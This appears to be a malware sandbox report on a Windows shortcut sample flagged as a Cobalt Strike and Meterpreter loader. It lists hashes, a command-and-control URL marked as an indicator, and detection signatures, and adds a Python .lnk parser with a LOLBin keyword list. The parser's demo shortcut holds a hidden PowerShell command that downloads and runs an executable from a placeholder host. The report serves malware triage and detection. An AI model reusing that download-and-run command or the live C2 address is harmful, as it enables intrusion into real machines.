General
Target: 21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20
Size: 1KB
Sample: 220701-kqe6kscaak
MD5: e3f89049dc5f0065ee4d780f8aef9c04
SHA1: ba5fcbdbd5b71bfc52b8a824bd40c547a7223260
SHA256: 21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20
SHA512: a4f8e14e9caa4c32bb5dcd97d3ac4a050ba63172429172de78c145f05e12c4982fcbb4200cf179da254f70dcf3a0587e5898a0df0bb47beec6a1fc1c44b8a5d9
Static task: static1
Behavioral task: behavioral1
  Sample: 21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20.lnk
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20.lnk
  Resource: win10v2004-20220414-en
Malware Config
Extracted URL (treat as a network IOC): http://120.48.85.228:80/favicon
Targets
Target: 21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20
Score: 10/10
Signatures:
  suricata: ET MALWARE Cobalt Strike Beacon Observed
  suricata: ET MALWARE Meterpreter or Other Reverse Shell SSL Cert
  Blocklisted process makes network request
  Checks computer location settings: looks up the country code configured in the registry, likely a geofence check before the payload runs.
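The sample is a 1KB Windows shortcut, and the behavioral signatures show a blocklisted process making a network request, so the first triage question is what the .lnk actually launches. The following is an added example, not code from the sandbox vendor or from this report: a minimal parser for the MS-SHLLINK layout (ShellLinkHeader, optional LinkTargetIDList and LinkInfo skipped by their size fields, then the StringData fields) with a small heuristic pass over the launch command. The demo .lnk bytes it builds are constructed here for illustration with a placeholder URL (example.invalid); they are not the bytes of the analysed file, and the LOLBin list and the cp1252 fallback for non-Unicode strings are assumptions of this example.

```python
"""Minimal MS-SHLLINK (.lnk) string-data extractor for triage (added example)."""
import struct

HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in exactly this order when their flag bit is set
STRING_FIELDS = [
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
]

SW_SHOWMINNOACTIVE = 7  # window starts minimized, a common "hide the console" trick

# Assumed list of script hosts / LOLBins worth flagging in a shortcut target
LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec", "curl")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields of a Shell Link file."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize/LinkCLSID)")
    (show_cmd,) = struct.unpack_from("<I", data, 0x3C)  # ShowCommand offset
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts itself
        (linkinfo_size,) = struct.unpack_from("<I", data, pos)
        pos += linkinfo_size
    unicode = bool(flags & IS_UNICODE)
    out = {"show_command": show_cmd}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            out[field] = None
            continue
        (count,) = struct.unpack_from("<H", data, pos)  # CountCharacters
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {field}")
        # cp1252 for the ANSI case is an assumption (system code page varies)
        out[field] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
        pos += nbytes
    return out


def triage(info: dict) -> list:
    """Simple heuristics over what the shortcut launches."""
    findings = []
    launch = " ".join(filter(None, [info.get("relative_path"),
                                    info.get("arguments")])).lower()
    if any(b in launch for b in LOLBINS):
        findings.append("launches a script host / LOLBin")
    if "http://" in launch or "https://" in launch:
        findings.append("command line contains a URL")
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        findings.append("window minimized on launch (SW_SHOWMINNOACTIVE)")
    return findings


def _s(text: str) -> bytes:
    """Encode one StringData field: CountCharacters + UTF-16LE, no terminator."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk() -> bytes:
    """Constructed demo shortcut (NOT the analysed sample's bytes)."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH
             | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    idlist = struct.pack("<HH", 6, 4) + b"\x00\x00" + b"\x00\x00"  # one ItemID + terminator
    linkinfo = struct.pack("<II", 0x1C, 0x1C) + b"\x00" * (0x1C - 8)  # minimal header
    strings = (_s(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
               + _s(r"C:\Windows\System32")
               + _s('-w hidden -nop -c "iwr http://example.invalid/favicon '
                    '-OutFile $env:TEMP\\f.exe; & $env:TEMP\\f.exe"'))
    return header + idlist + linkinfo + strings


if __name__ == "__main__":
    info = parse_lnk(build_sample_lnk())
    for k, v in info.items():
        print(f"{k}: {v}")
    print("findings:", triage(info))
```

Run it against a real sample with `parse_lnk(open(path, "rb").read())`; the relative path plus arguments is usually enough to see which process the shortcut spawns and whether it stages a download, which is what the "blocklisted process makes network request" signature above is reporting at runtime.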